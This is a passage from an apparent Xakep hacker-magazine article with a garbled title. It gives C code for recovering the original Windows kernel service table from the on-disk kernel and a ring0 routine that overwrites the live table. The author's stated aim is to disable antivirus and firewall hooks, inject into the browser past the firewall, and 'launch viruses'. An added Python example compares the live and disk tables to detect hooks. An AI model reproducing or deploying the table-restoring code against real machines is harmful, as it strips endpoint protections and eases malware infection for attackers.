áúðчðть - Xakep Online
    DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT)
    {
        /* The signature and the first declarations are restored from the usage below:
           the page's copy of the listing begins in the middle of the DWORD declaration.
           GetHeaders, RVATOVA and PIMAGE_FIXUP_ENTRY are defined elsewhere in the article. */
        PIMAGE_FILE_HEADER pfh;
        PIMAGE_OPTIONAL_HEADER poh;
        PIMAGE_SECTION_HEADER psh;
        PIMAGE_BASE_RELOCATION pbr;
        PIMAGE_FIXUP_ENTRY pfe;
        DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
        BOOL bFirstChunk;

        GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

        /* Walk the base relocation directory, if the image still has one. */
        if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)
            && (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {
            pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);
            bFirstChunk=TRUE;
            while (bFirstChunk || pbr->VirtualAddress) {
                bFirstChunk=FALSE;
                pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr + sizeof(IMAGE_BASE_RELOCATION));
                /* Each block holds (SizeOfBlock - header) / 2 WORD-sized fixup entries. */
                for (i=0;i<((pbr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))>>1);i++,pfe++)
                {
                    if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                        dwFixups++;
                        /* RVA of the 32-bit pointer being relocated, and the RVA it points to. */
                        dwPointerRva=pbr->VirtualAddress+pfe->offset;
                        dwPointsToRva=*(PDWORD)((DWORD)hModule + dwPointerRva)-(DWORD)poh->ImageBase;
                        if (dwPointsToRva==dwKSDT)
                        {
                            /* C7 05 imm32 imm32 is "mov dword ptr [KeServiceDescriptorTable], imm32":
                               the kernel's own initialisation of the descriptor. The second imm32,
                               4 bytes past the relocated pointer, is the address of KiServiceTable. */
                            if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
                            {
                                dwKiServiceTable=*(PDWORD)((DWORD)hModule + dwPointerRva+4) - poh->ImageBase;
                                return dwKiServiceTable;
                            }
                        }
                    }
                }
                *(PDWORD)&pbr += pbr->SizeOfBlock;
            }
        }
        return 0;
    }
Having obtained the SDT offset, we add it to the base of our copy of the kernel; that gives the address of the original table. Just in case, we copy the whole contents of the SDT into our own DWORD array and rejoice: the main job is done, we have the original.
    GetHeaders((PCHAR)hKernel,&pfh,&poh,&psh);
    /* Copy the on-disk KiServiceTable entry by entry, stopping at the first value that is
       not an address inside the image. Each entry is rebased from the link-time ImageBase
       to the address the kernel is actually loaded at. */
    for (pService=(PDWORD)((DWORD)hKernel+dwKiServiceTable);
         *pService-poh->ImageBase<poh->SizeOfImage;
         pService++,dwServices++)
        TABLE[dwServices] = *pService - poh->ImageBase+dwKernelBase;
    NEWTABLE = (DWORD)(dwKernelBase + dwKSDT);
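The rebasing loop above yields a reference copy of the service table. The same reference is what a hook detector (the VICE tool pictured later in the article is one) compares the live table against to spot redirected entries. The following Python example is added here and is not code from the article or from its disc; the image base, image size, loaded kernel base and both tables are constructed values, and the termination test and rebasing arithmetic follow the article's loop.

```python
import struct

# Constructed values (not from the article): link-time base and size of the on-disk
# kernel image, and the base it is loaded at in the running system.
IMAGE_BASE = 0x00400000
SIZE_OF_IMAGE = 0x00200000
KERNEL_BASE = 0x804D7000

# Constructed on-disk KiServiceTable: four entries linked at IMAGE_BASE, followed by
# the first value after the table, which is not an address inside the image.
DISK_TABLE_BYTES = struct.pack('<5I', 0x00405000, 0x00405100, 0x00405200,
                               0x00405300, 0x0000011C)

# Constructed live table as read from the running kernel: entry 1 has been redirected
# to a driver outside the kernel image, entry 3 to a different spot inside it.
LIVE_TABLE = [0x804DC000, 0xF8A1B000, 0x804DC200, 0x804DC310]

MASK32 = 0xFFFFFFFF


def inside_image(address, base, size):
    """Unsigned 32-bit form of the article's test: address - base < SizeOfImage."""
    return ((address - base) & MASK32) < size


def parse_disk_table(blob, image_base, size_of_image):
    """Read DWORDs from the on-disk table until one is not an address in the image."""
    entries = []
    for (value,) in struct.iter_unpack('<I', blob):
        if not inside_image(value, image_base, size_of_image):
            break
        entries.append(value)
    return entries


def rebase(entries, image_base, kernel_base):
    """Move link-time addresses to the loaded base (the article's TABLE[] loop)."""
    return [(entry - image_base + kernel_base) & MASK32 for entry in entries]


def check_ssdt(live, reference, kernel_base, size_of_image):
    """Compare the live table with the rebased disk copy.

    Returns a list of (index, live_value, reason) for every entry that differs,
    distinguishing targets inside the kernel image from targets outside it.
    """
    findings = []
    if len(live) != len(reference):
        findings.append((-1, len(live), 'service count differs from disk copy'))
    for idx, (cur, ref) in enumerate(zip(live, reference)):
        if cur == ref:
            continue
        if inside_image(cur, kernel_base, size_of_image):
            reason = 'differs from disk copy, target inside kernel image'
        else:
            reason = 'differs from disk copy, target outside kernel image'
        findings.append((idx, cur, reason))
    return findings


def reference_table():
    """Reference SSDT built from the constructed on-disk bytes."""
    disk = parse_disk_table(DISK_TABLE_BYTES, IMAGE_BASE, SIZE_OF_IMAGE)
    return rebase(disk, IMAGE_BASE, KERNEL_BASE)


if __name__ == '__main__':
    for idx, value, reason in check_ssdt(LIVE_TABLE, reference_table(),
                                         KERNEL_BASE, SIZE_OF_IMAGE):
        print(f'service {idx}: live 0x{value:08X}: {reason}')
```

Entries that point outside the kernel image are the classic signature of a filter driver hooking a service; an entry that differs but still lands inside the image is worth a closer look at the target bytes rather than an automatic verdict, since a hot-patched kernel can legitimately move a handler.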
Now, once in kernel mode, you can either restore the SDT, simply replacing every address in the current table with the ones just obtained, in order to kill all the protections, or use those same addresses directly to get around the hook. For bypassing NtWriteVirtualMemory, restoring is simpler, while using the addresses directly is less conspicuous. Directly means calling the function at the obtained address straight from ring0.
In short, let's switch off all the protections.
[restoring the SDT at kernel level]
    void InKerneProc()
    {
        /* NEWTABLE holds the address of KeServiceDescriptorTable; its first DWORD is the
           pointer to the live KiServiceTable, whose entries are overwritten with the
           addresses recovered from the on-disk kernel. */
        for (int i = 0; i < dwServices; i++)
            ((DWORD*)(*(DWORD*)(NEWTABLE)))[i] = TABLE[i];
    }
Run this function at kernel level. If you like, inject code into the browser to get past the firewall; nobody will say a word to you. If you like, launch viruses. In short, all the protections fall asleep. Not bad, eh? And that is not even the only use of anti-hooking at kernel level. It also lets you fight serious kernel rootkits. You can knock out some tricky anti-debugging techniques. In short, beyond the banal disabling of protections, you will find uses for it.
The full source code of the program that disables all the protections and bypasses firewalls is on the disc; I strongly advise you to dig through it properly.
This is where I end my story. If any questions have come up, write to me and I will try to explain everything. Happy compiling!
[XAKEP 09 [81] 05 > CODING 126]
VICE detects the hooks of Kaspersky Anti-Virus
Bypassing a firewall is a matter of 9 KB of code